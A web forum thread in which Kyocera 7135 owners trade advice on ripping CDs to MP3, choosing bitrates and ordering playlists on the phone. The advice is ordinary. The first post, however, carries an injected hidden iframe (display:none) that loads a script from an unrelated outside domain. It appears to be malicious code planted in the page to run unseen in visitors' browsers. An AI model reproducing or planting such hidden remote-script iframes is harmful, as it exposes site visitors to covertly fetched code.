+ Reply to Thread

Thread: MP3 help please

Fully Converged

MP3 help please

Okay, I've never had an MP3 player so the 7135 is my first forray into the world of MP3 music.

Although I understand how to use the MP3 desktop, etc, I don't know where to start in getting my CDs converted to MP3s.

Is there a decent software package for conversion? I have Roxio for copying CDs but apparently need to upgrade to "rip" MP3s. I don't mind upgrading, but for $70 is there another program I should be looking at?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    From the Middle of the Sea ;-)

Resident Curmudgeon
    MusicMatch Jukebox works well for me. You can download the freebie version from their website . If you like it (and I'd expect that you would), you can upgrade to the paid version for around $35. If you want to get access to lots of music via their paid broadband "radio" site, you can also subscribe to that. All in all, it is a nice package and a very good deal.

-PatP

DO NOT pay $70 for software to rip CDs. You can get plenty that is free.

You can get Musicmatch Basic for free (www.musicmatch.com), or pay $20 for all the extras. Basic will let you rip music and burn Cd's though, which is really all you need for the moment. Musicmatch will access the CDDB database to fill in your artist and track information for the MP3 tags. I think there are some clunky places in musicmatch, but for getting your music onto the hard drive it will work fine. There are other programs if you just do a cnet.com search for "ripper" or "rip".
    ---------------
    The same thing we do every night, Pinky...

Try CDEX - it's simple, and it's free.

Fully Converged
    Thanks so much, guys and doll! I'm sitting here listening to Pink's "Don't let me get me" on the MP3 player while working. Great sound quality with the Kyo stereo headphones.

For our information, what MP3 solution did you end up using???
    Michael

Fully Converged
    Originally posted by Michael Rye
    For our information, what MP3 solution did you end up using???
    I already had Music Match which came bundled on my new Dell 8200 Inspiron laptop. I didn't realize it had a recorder function.

So I ripped a couple of CDs and downloaded the MP3s onto the SD card. Next time I'll use the cruzer to download to the SD card as the Kyo download function was pretty slow. I haven't figured out how to re-arrange the order of the playlist yet on the 7135, but I'll break down and read the manual on the CDROM.

Hey all, anyone find the optimum bitrate to encode in? I currently use 112 kbps, but am wondering if anyone noticed quality degradation with 96. Btw, I use Easy CD Extractor.

Resident Curmudgeon
    The minimum error-free bitrate depends on the dynamic range of the recording. For all but the most demanding music, 96 K should be plenty. For speech (like audiobooks), 32 K is a tiny bit grainy (about like a wired phone) and 48 K is better than most people's ears can hear.

Now if you want to record a symphony, with lots of dynamic range...

-PatP

Originally posted by joekonaiii
    I haven't figured out how to re-arrange the order of the playlist yet on the 7135, but I'll break down and read the manual on the CDROM.
    You have to use the loader program to change the playlist order of files you've already loaded.

Another way if you are using a card reader is to remove the MP3s from the card and then one by one, drag and drop them on the card in the order you want them to play. Even doing that is faster than the factory loader program.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by KLiuLess
    Hey all, anyone find the optimum bitrate to encode in? I currently use 112 kbps, but am wondering if anyone noticed quality degradation with 96. Btw, I use Easy CD Extractor.

I agree with PatP, most of mine are at 64kps.... And they still sound fine, on the Kyocera stereo headphones :drummer

Nothing sounds fine on my kyocera stereo headphones; the buds are too big for my ear-holes, and fall out all the time.

I'm a stickler for music quality, and have settled on 128 kbps as a good compromise between audio quality and file size -- and the highest bit-rate the 7135 can handle, apparently.

I'm going to be trying out that other 7135 mp3 player -- bebopp, or something like that, I think it's called -- because the standard one has many shortcomings.

more mp3 help

Another way if you are using a card reader is to remove the MP3s from the card and then one by one, drag and drop them on the card in the order you want them to play. Even doing that is faster than the factory loader program.

I have windows xp. When I do this, the songs will not move out of alphebitical order. What am I doing wrong?
    :anger

I never have figured out how to get my MP3's to stay in the correct order in windows xp. However, if you create a playlist in windows media player, you can load that list onto your card that the songs will stay in the correct order. If anyone can figure out how to do this in windows xp, I would love to know how.

My first advice to anyone that wants to use thier 7135 as an MP3 player is to ignore the included one. It works, but as far as anykind of functionality it has much to be desired. Go to www.belltools.com and download beebopper. It was designed from the ground up to work with the 7135 and even allows you to arrange the playlist as you like. See the belltools forum for hints on how to arrange and save playlists. The only relation I have to beebopper is being a satisified user.

Hint #2: Don't use the loader program that came with the 7135, unless you have lots and lots of free time and no other means of uploading songs. I takes forever to upload sonds through a sync. Instead invest in a card reader and then you can copy the songs to the desired folders through a drive link and its much faster.
    mg